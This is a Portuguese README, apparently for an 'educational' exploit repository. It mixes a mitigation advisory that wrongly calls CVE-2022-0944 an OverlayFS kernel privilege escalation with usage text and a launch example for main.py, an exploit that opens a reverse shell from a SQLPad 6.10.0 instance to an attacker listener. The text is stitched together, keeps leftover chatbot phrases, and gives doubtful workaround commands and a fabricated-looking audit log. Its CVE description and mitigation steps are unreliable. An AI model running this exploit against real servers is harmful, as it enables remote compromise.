
Exploit educacional para CVE-2022-0944 escalonamento de privilégios OverlayFS com entrega de payload reverse shell e scripts de detecção de versão do kernel.
Aviso de segurança e guia de mitigação para a vulnerabilidade de escalação de privilégios no OverlayFS do kernel Linux.
CVE-2022-0944 é uma vulnerabilidade de segurança no subsistema OverlayFS do kernel Linux que permite que atacantes locais escalem privilégios através do tratamento inadequado da criação de arquivos em configurações específicas.

🚨 Impacto
Um atacante local poderia:
Obter privilégios de root através de operações de arquivo manipuladas
Contornar restrições de segurança
Modificar arquivos sensíveis do sistema
Comprometer a integridade de todo o sistema
🔍 Detecção
grep CVE-2022-0944 /var/log/apt/history.log
# Para RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ Mitigação
Patches Oficiais
Atualize para uma destas versões corrigidas:
Linux Kernel 5.16.12 ou posterior
Patches retroportados específicos do fornecedor
Comando de Atualização:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
Soluções Alternativas (Se a Correção Não For Imediata)
Restringir o uso do OverlayFS:
sudo modprobe -r overlay
Implementar restrições de namespace:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
Aplicar políticas SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ Aviso Legal Este documento é fornecido apenas para fins informativos. Embora tenham sido feitos esforços para garantir a precisão, nenhuma garantia é fornecida. Sempre teste os patches em um ambiente de desenvolvimento antes da implantação em produção.
Última Atualização: 2023-10-01 | Ver Changelog
Principais Características:
Este formato de README é adequado para:
Gostaria que eu:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
Exemplo:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Este repositório contém código e ferramentas que são destinados exclusivamente para fins educacionais, especificamente para uso em cursos de segurança cibernética e ambientes de aprendizagem. O autor deste código não assume nenhuma responsabilidade por quaisquer consequências decorrentes do uso, uso indevido ou modificação deste código. O código é fornecido "como está", sem qualquer garantia, expressa ou implícita, incluindo, mas não se limitando a, garantias implícitas de comercialização ou adequação a um propósito específico.